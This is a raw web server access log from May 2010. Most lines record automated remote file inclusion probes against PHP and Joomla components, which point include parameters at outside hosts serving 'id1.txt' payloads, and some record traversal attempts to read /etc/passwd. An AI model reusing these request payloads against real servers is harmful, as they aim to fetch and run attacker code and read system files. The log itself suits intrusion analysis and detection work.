202.72.242.242 - - [08/May/2010:06:15:11 -0500] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig.absolute.path=http://www.dvhrunners.co.kr//bbs//data/id1.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
202.72.242.242 - - [08/May/2010:06:15:11 -0500] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig.absolute.path=http://www.dvhrunners.co.kr//bbs//data/id1.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
202.72.242.242 - - [08/May/2010:06:15:11 -0500] "GET /logs/access_log.1270598400%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig.absolute.path=http://www.dvhrunners.co.kr//bbs//data/id1.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
202.72.242.242 - - [08/May/2010:06:15:11 -0500] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig.absolute.path=http://www.dvhrunners.co.kr//bbs//data/id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
202.72.242.242 - - [08/May/2010:06:15:11 -0500] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig.absolute.path=http://www.dvhrunners.co.kr//bbs//data/id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
202.72.242.242 - - [08/May/2010:06:15:11 -0500] "GET /logs/access_log.1270598400%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig.absolute.path=http://www.dvhrunners.co.kr//bbs//data/id1.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
121.190.102.21 - - [08/May/2010:06:18:05 -0500] "GET /logs//auth/auth_SMF/smf_root_path=http://francophonie.utm.md/id1.txt? HTTP/1.1" 404 352 "-""Mozilla/5.0"
121.190.102.21 - - [08/May/2010:06:18:05 -0500] "GET //auth/auth_SMF/smf_root_path=http://francophonie.utm.md/id1.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
121.190.102.21 - - [08/May/2010:06:18:05 -0500] "GET /logs/access_log.1247270400//auth/auth_SMF/smf_root_path=http://francophonie.utm.md/id1.txt? HTTP/1.1" 404 374 "-""Mozilla/5.0"
207.46.13.48 - - [08/May/2010:06:19:20 -0500] "GET /costume/thmb8.htm HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [08/May/2010:06:25:30 -0500] "GET /logs/access_log.1237939200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
124.0.74.195 - - [08/May/2010:06:26:59 -0500] "GET ///administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://www.gigacenter.cl//tmp/id1.txt??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
124.0.74.195 - - [08/May/2010:06:26:59 -0500] "GET /logs///administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://www.gigacenter.cl//tmp/id1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
124.0.74.195 - - [08/May/2010:06:26:59 -0500] "GET /logs/access_log.1223683200///administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://www.gigacenter.cl//tmp/id1.txt??? HTTP/1.1" 404 369 "-""Mozilla/5.0"
207.46.13.54 - - [08/May/2010:06:29:20 -0500] "GET /logs/access_log.1267833600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [08/May/2010:06:31:12 -0500] "GET /logs/access_log.1248912000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [08/May/2010:06:38:26 -0500] "GET /tattoo/set4.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
69.163.170.74 - - [08/May/2010:06:40:38 -0500] "GET /logs//index1.php?s=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""libwww-perl/5.805"
69.163.170.74 - - [08/May/2010:06:40:38 -0500] "GET //index1.php?s=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
69.163.170.74 - - [08/May/2010:06:40:40 -0500] "GET /logs//index1.php?s=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""libwww-perl/5.805"
69.163.170.74 - - [08/May/2010:06:40:40 -0500] "GET //index1.php?s=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
91.121.12.17 - - [08/May/2010:06:40:58 -0500] "GET //components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://tadutaf.com/modules//id1.txt???? HTTP/1.1" 404 334 "-""Mozilla/5.0"
91.121.12.17 - - [08/May/2010:06:40:58 -0500] "GET /logs/access_log.1264723200//components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://tadutaf.com/modules//id1.txt???? HTTP/1.1" 404 361 "-""Mozilla/5.0"
91.121.12.17 - - [08/May/2010:06:40:58 -0500] "GET /logs//components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://tadutaf.com/modules//id1.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
91.121.12.17 - - [08/May/2010:06:40:58 -0500] "GET //components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://tadutaf.com/modules//id1.txt???? HTTP/1.1" 404 334 "-""Mozilla/5.0"
91.121.12.17 - - [08/May/2010:06:40:58 -0500] "GET /logs//components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://tadutaf.com/modules//id1.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
91.121.12.17 - - [08/May/2010:06:40:58 -0500] "GET /logs/access_log.1264723200//components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://tadutaf.com/modules//id1.txt???? HTTP/1.1" 404 361 "-""Mozilla/5.0"
91.121.12.17 - - [08/May/2010:06:41:04 -0500] "GET /logs/access_log.1263772800//components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://tadutaf.com/modules//id1.txt???? HTTP/1.1" 404 361 "-""Mozilla/5.0"
91.121.12.17 - - [08/May/2010:06:41:07 -0500] "GET /logs/access_log.1263772800//components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://tadutaf.com/modules//id1.txt???? HTTP/1.1" 404 361 "-""Mozilla/5.0"
209.172.33.203 - - [08/May/2010:06:41:52 -0500] "GET //components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://tadutaf.com/modules//id1.txt???? HTTP/1.1" 404 334 "-""Mozilla/5.0"
209.172.33.203 - - [08/May/2010:06:41:52 -0500] "GET /logs/access_log.1263772800//components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://tadutaf.com/modules//id1.txt???? HTTP/1.1" 404 361 "-""Mozilla/5.0"
209.172.33.203 - - [08/May/2010:06:41:52 -0500] "GET /logs//components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://tadutaf.com/modules//id1.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
217.173.194.130 - - [08/May/2010:06:43:01 -0500] "GET /logs//admin.php?cal_dir=http://www.centrallease.co.uk//logs/zfxid1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
217.173.194.130 - - [08/May/2010:06:43:01 -0500] "GET //admin.php?cal_dir=http://www.centrallease.co.uk//logs/zfxid1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
217.173.194.130 - - [08/May/2010:06:43:01 -0500] "GET /logs/access_log.1264550400//admin.php?cal_dir=http://www.centrallease.co.uk//logs/zfxid1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
217.173.194.130 - - [08/May/2010:06:43:01 -0500] "GET /logs/access_log.1263427200//admin.php?cal_dir=http://www.centrallease.co.uk//logs/zfxid1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
217.173.194.130 - - [08/May/2010:06:43:17 -0500] "GET /logs/access_log.1264550400//admin.php?cal_dir=http://www.centrallease.co.uk//logs/zfxid1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
217.173.194.130 - - [08/May/2010:06:43:17 -0500] "GET //admin.php?cal_dir=http://www.centrallease.co.uk//logs/zfxid1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
217.173.194.130 - - [08/May/2010:06:43:17 -0500] "GET /logs/access_log.1263427200//admin.php?cal_dir=http://www.centrallease.co.uk//logs/zfxid1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
217.173.194.130 - - [08/May/2010:06:43:22 -0500] "GET /logs//admin.php?cal_dir=http://www.centrallease.co.uk//logs/zfxid1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
62.44.82.61 - - [08/May/2010:06:43:45 -0500] "GET /logs//components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://tadutaf.com/modules//id1.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
62.44.82.61 - - [08/May/2010:06:43:45 -0500] "GET //components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://tadutaf.com/modules//id1.txt???? HTTP/1.1" 404 334 "-""Mozilla/5.0"
62.44.82.61 - - [08/May/2010:06:43:45 -0500] "GET /logs/access_log.1264723200//components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://tadutaf.com/modules//id1.txt???? HTTP/1.1" 404 361 "-""Mozilla/5.0"
62.44.82.61 - - [08/May/2010:06:43:51 -0500] "GET /logs/access_log.1263772800//components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://tadutaf.com/modules//id1.txt???? HTTP/1.1" 404 361 "-""Mozilla/5.0"
209.172.33.203 - - [08/May/2010:06:43:52 -0500] "GET //components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://tadutaf.com/modules//id1.txt???? HTTP/1.1" 404 334 "-""Mozilla/5.0"
209.172.33.203 - - [08/May/2010:06:43:52 -0500] "GET /logs//components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://tadutaf.com/modules//id1.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
209.172.33.203 - - [08/May/2010:06:43:52 -0500] "GET /logs/access_log.1263772800//components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://tadutaf.com/modules//id1.txt???? HTTP/1.1" 404 361 "-""Mozilla/5.0"
114.108.151.149 - - [08/May/2010:06:48:58 -0500] "GET /logs/access_log.1272067200%20%20/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 365 "-""Mozilla/5.0"
114.108.151.149 - - [08/May/2010:06:48:58 -0500] "GET /logs/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 341 "-""Mozilla/5.0"
114.108.151.149 - - [08/May/2010:06:48:58 -0500] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
222.122.52.80 - - [08/May/2010:06:49:51 -0500] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://anfar4.fileave.com/id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
222.122.52.80 - - [08/May/2010:06:49:51 -0500] "GET /logs/access_log.1272067200%20%20//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://anfar4.fileave.com/id1.txt? HTTP/1.1" 404 341 "-""Mozilla/5.0"
222.122.52.80 - - [08/May/2010:06:49:52 -0500] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://anfar4.fileave.com/id1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
222.122.52.80 - - [08/May/2010:06:49:55 -0500] "GET /logs/access_log.1270598400%20%20//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://anfar4.fileave.com/id1.txt? HTTP/1.1" 404 341 "-""Mozilla/5.0"
222.122.52.80 - - [08/May/2010:06:50:00 -0500] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://anfar4.fileave.com/id1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
222.122.52.80 - - [08/May/2010:06:50:01 -0500] "GET /logs/access_log.1272067200%20%20//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://anfar4.fileave.com/id1.txt? HTTP/1.1" 404 341 "-""Mozilla/5.0"
222.122.52.80 - - [08/May/2010:06:50:01 -0500] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://anfar4.fileave.com/id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
222.122.52.80 - - [08/May/2010:06:50:05 -0500] "GET /logs/access_log.1270598400%20%20//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://anfar4.fileave.com/id1.txt? HTTP/1.1" 404 341 "-""Mozilla/5.0"
114.108.151.149 - - [08/May/2010:06:51:20 -0500] "GET /logs/access_log.1272067200/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 363 "-""Mozilla/5.0"
114.108.151.149 - - [08/May/2010:06:51:58 -0500] "GET /logs/access_log.1270857600/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 363 "-""Mozilla/5.0"
67.218.116.166 - - [08/May/2010:06:52:11 -0500] "GET /logs/access_log.1244764800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
217.173.194.130 - - [08/May/2010:06:52:26 -0500] "GET /logs//convert-date.php?cal_dir=http://www.centrallease.co.uk//logs/zfxid1.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0"
217.173.194.130 - - [08/May/2010:06:52:26 -0500] "GET /logs/access_log.1262563200//convert-date.php?cal_dir=http://www.centrallease.co.uk//logs/zfxid1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
217.173.194.130 - - [08/May/2010:06:52:26 -0500] "GET //convert-date.php?cal_dir=http://www.centrallease.co.uk//logs/zfxid1.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
217.173.194.130 - - [08/May/2010:06:52:27 -0500] "GET /logs/access_log.1263513600//convert-date.php?cal_dir=http://www.centrallease.co.uk//logs/zfxid1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
208.80.193.39 - - [08/May/2010:06:52:27 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Whirlpool BD2; H010818)"
217.173.194.130 - - [08/May/2010:06:52:37 -0500] "GET /logs//convert-date.php?cal_dir=http://www.centrallease.co.uk//logs/zfxid1.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0"
217.173.194.130 - - [08/May/2010:06:52:37 -0500] "GET //convert-date.php?cal_dir=http://www.centrallease.co.uk//logs/zfxid1.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
217.173.194.130 - - [08/May/2010:06:52:37 -0500] "GET /logs/access_log.1262563200//convert-date.php?cal_dir=http://www.centrallease.co.uk//logs/zfxid1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
216.129.119.42 - - [08/May/2010:06:52:41 -0500] "GET /logs/access_log.1236643200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
217.173.194.130 - - [08/May/2010:06:52:47 -0500] "GET /logs/access_log.1263513600//convert-date.php?cal_dir=http://www.centrallease.co.uk//logs/zfxid1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
87.250.255.243 - - [08/May/2010:06:52:52 -0500] "GET /logs/access_log.1216857600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
114.108.151.149 - - [08/May/2010:06:53:18 -0500] "GET /logs/access_log.1264723200/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 363 "-""Mozilla/5.0"
114.108.151.149 - - [08/May/2010:06:53:26 -0500] "GET /logs/access_log.1266451200/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 363 "-""Mozilla/5.0"
189.108.172.26 - - [08/May/2010:06:56:47 -0500] "GET /logs/access_log.1270598400%20%20/inc/header.php/step_one.php?server_inc=http://www.bmbath.com/bbs/data/gongji/copyright.txt???? HTTP/1.1" 404 340 "-""Mozilla/5.0"
189.108.172.26 - - [08/May/2010:06:56:47 -0500] "GET /inc/header.php/step_one.php?server_inc=http://www.bmbath.com/bbs/data/gongji/copyright.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
189.108.172.26 - - [08/May/2010:06:56:47 -0500] "GET /logs/inc/header.php/step_one.php?server_inc=http://www.bmbath.com/bbs/data/gongji/copyright.txt???? HTTP/1.1" 404 316 "-""Mozilla/5.0"
61.19.252.133 - - [08/May/2010:06:57:27 -0500] "GET /logs/access_log.1264550400/?sourcedir=http://www.ycrg.org/inits/id.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
61.19.252.133 - - [08/May/2010:06:57:27 -0500] "GET /logs/?sourcedir=http://www.ycrg.org/inits/id.txt?? HTTP/1.1" 200 4749 "-""Mozilla/5.0"
61.19.252.133 - - [08/May/2010:06:57:27 -0500] "GET /?sourcedir=http://www.ycrg.org/inits/id.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
61.19.252.133 - - [08/May/2010:06:58:05 -0500] "GET /logs/access_log.1262390400/?sourcedir=http://www.ycrg.org/inits/id.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
65.55.51.112 - - [08/May/2010:06:59:21 -0500] "GET /logs/access_log.1172707200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [08/May/2010:07:04:52 -0500] "GET /logs/access_log.1250294400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.218.116.163 - - [08/May/2010:07:07:17 -0500] "GET /logs/access_log.1243382400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
87.250.255.243 - - [08/May/2010:07:12:58 -0500] "GET /logs/access_log.1273017600 HTTP/1.1" 200 462567 "-""Yandex/1.01.001 (compatible; Win16; I)"
92.241.190.214 - - [08/May/2010:07:14:02 -0500] "GET /index0.php?show=http://doitinbergen.com/.logs???? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
92.241.190.214 - - [08/May/2010:07:14:02 -0500] "GET /logs/index0.php?show=http://doitinbergen.com/.logs???? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
92.241.190.214 - - [08/May/2010:07:14:02 -0500] "GET /logs/access_log.1270598400/index0.php?show=http://doitinbergen.com/.logs???? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
92.241.190.214 - - [08/May/2010:07:14:28 -0500] "GET /logs/access_log.1270857600/index0.php?show=http://doitinbergen.com/.logs???? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
209.172.33.203 - - [08/May/2010:07:15:49 -0500] "GET /index0.php?show=http://tadutaf.com/modules//id1.txt???? HTTP/1.1" 404 294 "-""Mozilla/5.0"
209.172.33.203 - - [08/May/2010:07:15:49 -0500] "GET /logs/index0.php?show=http://tadutaf.com/modules//id1.txt???? HTTP/1.1" 404 299 "-""Mozilla/5.0"
209.172.33.203 - - [08/May/2010:07:15:49 -0500] "GET /logs/access_log.1270598400%20%20/index0.php?show=http://tadutaf.com/modules//id1.txt???? HTTP/1.1" 404 323 "-""Mozilla/5.0"
209.172.33.203 - - [08/May/2010:07:15:51 -0500] "GET /index0.php?show=http://tadutaf.com/modules//id1.txt???? HTTP/1.1" 404 294 "-""Mozilla/5.0"
209.172.33.203 - - [08/May/2010:07:15:51 -0500] "GET /logs/index0.php?show=http://tadutaf.com/modules//id1.txt???? HTTP/1.1" 404 299 "-""Mozilla/5.0"
209.172.33.203 - - [08/May/2010:07:15:51 -0500] "GET /logs/access_log.1270598400%20%20/index0.php?show=http://tadutaf.com/modules//id1.txt???? HTTP/1.1" 404 323 "-""Mozilla/5.0"
62.44.82.61 - - [08/May/2010:07:15:51 -0500] "GET /logs/access_log.1270598400%20%20/index0.php?show=http://tadutaf.com/modules//id1.txt???? HTTP/1.1" 404 323 "-""Mozilla/5.0"
62.44.82.61 - - [08/May/2010:07:15:51 -0500] "GET /logs/index0.php?show=http://tadutaf.com/modules//id1.txt???? HTTP/1.1" 404 299 "-""Mozilla/5.0"
62.44.82.61 - - [08/May/2010:07:15:51 -0500] "GET /index0.php?show=http://tadutaf.com/modules//id1.txt???? HTTP/1.1" 404 294 "-""Mozilla/5.0"
61.19.252.133 - - [08/May/2010:07:16:36 -0500] "GET /index0.php?show=http://www.ycrg.org/logs/.logs???? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
61.19.252.133 - - [08/May/2010:07:16:37 -0500] "GET /logs/access_log.1270598400/index0.php?show=http://www.ycrg.org/logs/.logs???? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
61.19.252.133 - - [08/May/2010:07:16:37 -0500] "GET /logs/index0.php?show=http://www.ycrg.org/logs/.logs???? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
91.121.12.17 - - [08/May/2010:07:16:59 -0500] "GET /logs/access_log.1270598400%20%20/index0.php?show=http://tadutaf.com/modules//id1.txt???? HTTP/1.1" 404 323 "-""Mozilla/5.0"
91.121.12.17 - - [08/May/2010:07:16:59 -0500] "GET /logs/index0.php?show=http://tadutaf.com/modules//id1.txt???? HTTP/1.1" 404 299 "-""Mozilla/5.0"
91.121.12.17 - - [08/May/2010:07:16:59 -0500] "GET /index0.php?show=http://tadutaf.com/modules//id1.txt???? HTTP/1.1" 404 294 "-""Mozilla/5.0"
91.121.12.17 - - [08/May/2010:07:17:06 -0500] "GET /logs/index0.php?show=http://tadutaf.com/modules//id1.txt???? HTTP/1.1" 404 299 "-""Mozilla/5.0"
91.121.12.17 - - [08/May/2010:07:17:06 -0500] "GET /index0.php?show=http://tadutaf.com/modules//id1.txt???? HTTP/1.1" 404 294 "-""Mozilla/5.0"
91.121.12.17 - - [08/May/2010:07:17:06 -0500] "GET /logs/access_log.1270598400%20%20/index0.php?show=http://tadutaf.com/modules//id1.txt???? HTTP/1.1" 404 323 "-""Mozilla/5.0"
61.19.252.133 - - [08/May/2010:07:18:53 -0500] "GET /logs/access_log.1270857600/index0.php?show=http://www.ycrg.org/logs/.logs???? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
61.19.252.133 - - [08/May/2010:07:19:35 -0500] "GET /index0.php?show=http://www.ycrg.org/inits/id.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
61.19.252.133 - - [08/May/2010:07:19:35 -0500] "GET /logs/access_log.1263254400/index0.php?show=http://www.ycrg.org/inits/id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
61.19.252.133 - - [08/May/2010:07:19:35 -0500] "GET /logs/index0.php?show=http://www.ycrg.org/inits/id.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
61.19.252.133 - - [08/May/2010:07:19:35 -0500] "GET /logs/access_log.1266278400/index0.php?show=http://www.ycrg.org/inits/id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
61.19.252.133 - - [08/May/2010:07:21:00 -0500] "GET /logs/access_log.1270598400%20%20/index0.php?show=http://www.ycrg.org/inits/id.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
87.250.255.243 - - [08/May/2010:07:22:42 -0500] "GET /logs/access_log.1223078400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
62.44.82.61 - - [08/May/2010:07:23:01 -0500] "GET /logs/access_log.1263254400/index0.php?show=http://tadutaf.com/modules//id1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
62.44.82.61 - - [08/May/2010:07:23:15 -0500] "GET /logs/access_log.1266278400/index0.php?show=http://tadutaf.com/modules//id1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
62.44.82.61 - - [08/May/2010:07:23:20 -0500] "GET /logs/access_log.1263081600/index0.php?show=http://tadutaf.com/modules//id1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
207.46.13.85 - - [08/May/2010:07:23:21 -0500] "GET /logs/access_log.1208304000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
62.44.82.61 - - [08/May/2010:07:23:35 -0500] "GET /logs/access_log.1270598400/index0.php?show=http://tadutaf.com/modules//id1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
209.172.33.203 - - [08/May/2010:07:26:13 -0500] "GET /logs/access_log.1263254400/index0.php?show=http://tadutaf.com/modules//id1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
209.172.33.203 - - [08/May/2010:07:26:13 -0500] "GET /logs/access_log.1266278400/index0.php?show=http://tadutaf.com/modules//id1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
209.172.33.203 - - [08/May/2010:07:26:15 -0500] "GET /logs/access_log.1263254400/index0.php?show=http://tadutaf.com/modules//id1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
209.172.33.203 - - [08/May/2010:07:26:15 -0500] "GET /logs/access_log.1266278400/index0.php?show=http://tadutaf.com/modules//id1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
207.46.204.237 - - [08/May/2010:07:27:21 -0500] "GET /logs/access_log.1187222400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
209.172.33.203 - - [08/May/2010:07:27:41 -0500] "GET /logs/access_log.1270598400/index0.php?show=http://tadutaf.com/modules//id1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
209.172.33.203 - - [08/May/2010:07:28:31 -0500] "GET /logs/access_log.1270598400/index0.php?show=http://tadutaf.com/modules//id1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
91.121.12.17 - - [08/May/2010:07:28:40 -0500] "GET /logs/access_log.1263254400/index0.php?show=http://tadutaf.com/modules//id1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
91.121.12.17 - - [08/May/2010:07:28:41 -0500] "GET /logs/access_log.1263254400/index0.php?show=http://tadutaf.com/modules//id1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
91.121.12.17 - - [08/May/2010:07:28:44 -0500] "GET /logs/access_log.1266278400/index0.php?show=http://tadutaf.com/modules//id1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
91.121.12.17 - - [08/May/2010:07:28:45 -0500] "GET /logs/access_log.1266278400/index0.php?show=http://tadutaf.com/modules//id1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
91.121.12.17 - - [08/May/2010:07:29:20 -0500] "GET /logs/access_log.1270598400/index0.php?show=http://tadutaf.com/modules//id1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
91.121.12.17 - - [08/May/2010:07:29:24 -0500] "GET /logs/access_log.1270598400/index0.php?show=http://tadutaf.com/modules//id1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
87.250.255.243 - - [08/May/2010:07:33:57 -0500] "GET /artwork/furniture-motto-line.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
64.120.126.77 - - [08/May/2010:07:34:11 -0500] "HEAD /costume/costume1.htm HTTP/1.1" 200 0 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 (.NET CLR 3.5.30729)"
222.236.47.182 - - [08/May/2010:07:41:38 -0500] "GET /index1.php?site=http://onoi.org//administrator/includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
222.236.47.182 - - [08/May/2010:07:41:38 -0500] "GET /logs/index1.php?site=http://onoi.org//administrator/includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
222.236.47.182 - - [08/May/2010:07:41:38 -0500] "GET /logs/access_log.1266451200/index1.php?site=http://onoi.org//administrator/includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
222.236.47.182 - - [08/May/2010:07:42:13 -0500] "GET /logs/access_log.1263859200/index1.php?site=http://onoi.org//administrator/includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
87.250.255.243 - - [08/May/2010:07:43:48 -0500] "GET /logs/access_log.1226448000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.195.112.180 - - [08/May/2010:07:45:40 -0500] "GET /tattoo/tattoo1.htm HTTP/1.0" 200 4192 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
222.236.47.182 - - [08/May/2010:07:47:47 -0500] "GET /logs/index1.php?site=http://onoi.org//administrator/includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
222.236.47.182 - - [08/May/2010:07:47:47 -0500] "GET /index1.php?site=http://onoi.org//administrator/includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
222.236.47.182 - - [08/May/2010:07:47:47 -0500] "GET /logs/access_log.1266451200/index1.php?site=http://onoi.org//administrator/includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
